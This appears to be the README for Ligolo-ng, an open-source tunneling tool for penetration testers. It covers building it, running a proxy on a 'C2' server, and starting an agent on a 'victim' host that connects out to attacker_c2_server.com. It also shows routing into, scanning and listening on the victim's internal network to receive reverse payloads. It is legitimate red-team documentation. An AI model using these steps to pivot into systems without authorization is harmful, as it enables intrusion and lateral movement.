  • Multiple platforms supported for the agent

How is this different from Ligolo/Chisel/Meterpreter...?

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using gVisor.

When running the relay/proxy server, a tun interface is used; packets sent to this interface are translated and then transmitted to the agent's remote network.

As an example, for a TCP connection:

  • SYN packets are translated to connect() calls on the remote host
  • A SYN-ACK is sent back if connect() succeeds
  • A RST is sent if connect() returns ECONNRESET, ECONNABORTED, or ECONNREFUSED
  • Nothing is sent if the connection times out

This allows running tools like nmap without the use of proxychains (simpler and faster).

Building & Usage

Precompiled binaries

Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

Building Ligolo-ng

Building ligolo-ng (Go >= 1.20 is required):

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Setup Ligolo-ng

Linux

When using Linux, you need to create a tun interface on the Proxy Server (C2):

$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up

Windows

You need to download the Wintun driver (used by WireGuard) and place wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

Running Ligolo-ng proxy server

Start the proxy server on your Command and Control (C2) server (default port 11601):

$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

TLS Options

Using Let's Encrypt Autocert

When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

Using your own TLS certificates

If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

Automatic self-signed certificates (NOT RECOMMENDED)

The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

The -ignore-cert option needs to be used with the agent.

Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
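
For example, a lab-only pairing of the two options might look like this (the hostname is a placeholder):

$ ./proxy -selfcert
$ ./agent -connect attacker_c2_server.com:11601 -ignore-cert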

Using Ligolo-ng

Start the agent on your target (victim) computer (no privileges are required!):

$ ./agent -connect attacker_c2_server.com:11601

If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.
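
For instance (the SOCKS5 proxy address and credentials are placeholders):

$ ./agent -connect attacker_c2_server.com:11601 --socks 127.0.0.1:1080 --socks-user proxyuser --socks-pass proxypass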

A session should appear on the proxy server.

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

ligolo-ng » session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Display the network configuration of the agent using the ifconfig command:

[Agent : nchatelain@nworkstation] » ifconfig 
[...]
┌─────────────────────────────────────────────┐
│ Interface 3 │
├──────────────┬──────────────────────────────┤
│ Name │ wlp3s0 │
│ Hardware MAC │ de:ad:be:ef:ca:fe │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast │
│ IPv4 Address │ 192.168.0.30/24 │
└──────────────┴──────────────────────────────┘

Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

Linux:

$ sudo ip route add 192.168.0.0/24 dev ligolo

Windows:

> netsh int ipv4 show interfaces

Idx     Met         MTU          State        Name
---  ----------  ----------  ------------  ---------------------------
 25           5       65535  connected     ligolo

> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

Start the tunnel on the proxy:

[Agent : nchatelain@nworkstation] » start
[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation

You can now access the 192.168.0.0/24 agent network from the proxy server.

$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]

Agent Binding/Listening

You can listen to ports on the agent and redirect connections to your control/proxy server.

In a ligolo session, use the listener_add command.

The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to port 4321 of the proxy server.

[Agent : nchatelain@nworkstation] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!

On the proxy:

$ nc -lvp 4321

When a connection is made on TCP port 1234 of the agent, nc will receive the connection.

This is very useful when using reverse TCP/UDP payloads.

You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

[Agent : nchatelain@nworkstation] » listener_list 
┌───────────────────────────────────────────────────────────────────────────────┐
│                                Active listeners                               │
├───┬─────────────────────────┬────────────────────────┬────────────────────────┤
│ # │          AGENT          │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
├───┼─────────────────────────┼────────────────────────┼────────────────────────┤
│ 0 │ nchatelain@nworkstation │ 0.0.0.0:1234           │ 127.0.0.1:4321         │
└───┴─────────────────────────┴────────────────────────┴────────────────────────┘

[Agent : nchatelain@nworkstation] » listener_stop 0
INFO[1505] Listener closed.

Demo

ligolo-ng_demo.mp4

Does it require Administrator/root access?

On the agent side, no! Everything can be performed without administrative access.

However, on your relay/proxy server, you need to be able to create a tun interface.

Supported protocols/packets

  • TCP
  • UDP
  • ICMP (echo requests)

Performance

You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200 Mbits/s server to a 200 Mbits/s connection.

$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

Caveats

Because the agent runs without privileges, it's not possible to forward raw packets. When you perform an Nmap SYN scan, a TCP connect() is performed on the agent.

When using nmap, you should use --unprivileged or -PE to avoid false positives.
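
For example, reusing the scan from above:

$ nmap 192.168.0.0/24 -v -sV -n --unprivileged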

Todo

  • Implement other ICMP error messages (this will speed up UDP scans);
  • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up);
  • Add mTLS support.

Credits

  • Nicolas Chatelain <nicolas -at- chatelain.me>

